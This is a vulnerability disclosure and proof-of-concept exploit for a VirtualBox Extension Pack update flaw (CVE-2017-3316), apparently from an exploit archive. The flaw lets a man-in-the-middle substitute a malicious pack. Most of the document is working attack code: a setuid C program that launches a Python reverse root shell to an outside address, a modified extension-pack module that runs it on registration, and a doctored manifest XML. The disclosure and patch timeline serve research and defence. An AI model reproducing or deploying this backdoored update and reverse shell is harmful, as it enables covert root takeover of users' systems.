Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)

Wolfgang Hotwagner 27.01.2017 Verified Wait
Local Exploits Linux

Exploit Code

== [ Overview ] ===

    System affected: VirtualBox
    Software-Version: prior to 5.0.32, prior to 5.1.14
    User-Interaction: Required
    Impact: A Man-In-The-Middle could infiltrate an
Extension-Pack-Update to gain a root-shell

=== [ Detailed description ] ===

In my research about update mechanism of open-source software I found
vulnerabilities in Oracle's VirtualBox. It's possible to compromise a
system behind a firewall by infiltrating the updates of Extension-Packs
because of the following flaws:

1.  The Extension-Pack is updated via HTTP instead of HTTPS. The
Extension-Packs are not signed, so a Man-In-The-Middle could send his
own Extension-Pack(with malicious code included) instead of the regular
update to the target. The Code would be executed with user-permissions.
I reported this bug to Oracle but I think someone else discovered and
reported it before. This bug also affects VirtualBox prior to 5.0.32,
prior to 5.1.14. I don't know the CVE.

2.  CVE-2017-3316: There is a privilege escalation bug in the downloader
of VirtualBox. Extension-Packs are tar-archives. Tar-archives can
preserve permissions.  A Man-In-The-Middle could include an executable
with setuid-permissions to the Extension-Pack. If the victim downloads
the Ext-pack, it will be stored as owner root and without checking the
permissions of the binaries. This bug affects VirtualBox prior to
5.0.32, prior to 5.1.14

=== [ Proof-Of-Concept ] ===

The executeable of the following code is placed in the
Extension-Pack-Archive under linux.amd64/evil with setuid.

/* evil.c(executable with the reverse-shell) */
#include <unistd.h>

int main()
{
        setuid(0);
        execl("/usr/bin/python","python","-c","import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.12.32.15\",5000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);",NULL);
        return 0;
}

The  VirtualBox-Sources are downloaded next and the following code has
to be placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp:

/* $Id: VBoxEvilMain.cpp $ */
/** @file
 * Evil main module.
 */

/*
 * Copyright (C) 2010-2016 Oracle Corporation
 *
 * Permission is hereby granted, free of charge, to any person
 * obtaining a copy of this software and associated documentation
 * files (the "Software"), to deal in the Software without
 * restriction, including without limitation the rights to use,
 * copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following
 * conditions:
 *
 * The above copyright notice and this permission notice shall be
 * included in all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
 * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
 * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
 * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
 * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
 * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
 * OTHER DEALINGS IN THE SOFTWARE.
 */

#include <VBox/ExtPack/ExtPack.h>

#include <VBox/err.h>
#include <VBox/version.h>
#include <VBox/vmm/cfgm.h>
#include <iprt/string.h>
#include <iprt/param.h>
#include <iprt/path.h>



static PCVBOXEXTPACKHLP g_pHlp;

static const VBOXEXTPACKREG g_vboxEvilExtPackReg =
{
    VBOXEXTPACKREG_VERSION,
    /* .uVBoxFullVersion =  */  VBOX_FULL_VERSION,
    /* .pfnInstalled =      */  NULL,
    /* .pfnUninstall =      */  NULL,
    /* .pfnVirtualBoxReady =*/  NULL,
    /* .pfnConsoleReady =   */  NULL,
    /* .pfnUnload =         */  NULL,
    /* .pfnVMCreated =      */  NULL,
    /* .pfnVMConfigureVMM = */  NULL,
    /* .pfnVMPowerOn =      */  NULL,
    /* .pfnVMPowerOff =     */  NULL,
    /* .pfnQueryObject =    */  NULL,
    /* .pfnReserved1 =      */  NULL,
    /* .pfnReserved2 =      */  NULL,
    /* .pfnReserved3 =      */  NULL,
    /* .pfnReserved4 =      */  NULL,
    /* .pfnReserved5 =      */  NULL,
    /* .pfnReserved6 =      */  NULL,
    /* .u32Reserved7 =      */  0,
    VBOXEXTPACKREG_VERSION
};

#include <unistd.h>
/** @callback_method_impl{FNVBOXEXTPACKREGISTER}  */
extern "C" DECLEXPORT(int) VBoxExtPackRegister(PCVBOXEXTPACKHLP pHlp,
PCVBOXEXTPACKREG *ppReg, PRTERRINFO pErrInfo)
{

    pid_t pid = fork();
        if(pid == 0)
        {
        
execl("/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil","evil",NULL);
        }
    /*
     * Check the VirtualBox version.
     */
    if (!VBOXEXTPACK_IS_VER_COMPAT(pHlp->u32Version,
VBOXEXTPACKHLP_VERSION))
        return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
                             "Helper version mismatch - expected %#x got
%#x",
                             VBOXEXTPACKHLP_VERSION, pHlp->u32Version);
    if (   VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion) !=
VBOX_VERSION_MAJOR
        || VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion) !=
VBOX_VERSION_MINOR)
        return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
                             "VirtualBox version mismatch - expected
%u.%u got %u.%u",
                             VBOX_VERSION_MAJOR, VBOX_VERSION_MINOR,

VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion),

VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion));

    /*
     * We're good, save input and return the registration structure.
     */
    g_pHlp = pHlp;
    *ppReg = &g_vboxEvilExtPackReg;

    return VINF_SUCCESS;
}

After compiling, this Extension-Pack-Module is placed in the Archive
under linux.amd64/VBoxEvilMain.so. It's also necessary to modify the
ExtPack.xml so that the Evil-Module is used:

<!--?xml version="1.0"?-->
<virtualboxextensionpack version="1.0"
xmlns="http://www.virtualbox.org/VirtualBoxExtensionPack";>
    <name>Oracle VM VirtualBox Extension Pack</name>
    <description>USB 2.0 and USB 3.0 Host Controller, Host Webcam,
VirtualBox RDP, PXE ROM, Disk Encryption.</description>
    <version revision="112026">5.1.10</version>
    <mainmodule>VBoxEvilMain</mainmodule>
    <vrdemodule>VBoxVRDP</vrdemodule>
    <showlicense>
</showlicense></virtualboxextensionpack>

Note: To make this Extension-Pack valid it is necessary to add all the
file-checksumms to ExtPack.manifest. The victim will be asked for the
root password during the update. If the attacker sends this malicious
Extension-Pack, a reverse root-shell will be executed.

=== [ Timeline ] ===

This bug was reported in December. Oracle answered on the same day and
gave status reports regularly. They released a patch on January 17th.

=== [ Credits ] ===

CVE-2017-3316 was discovered by Wolfgang Hotwagner
(https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316)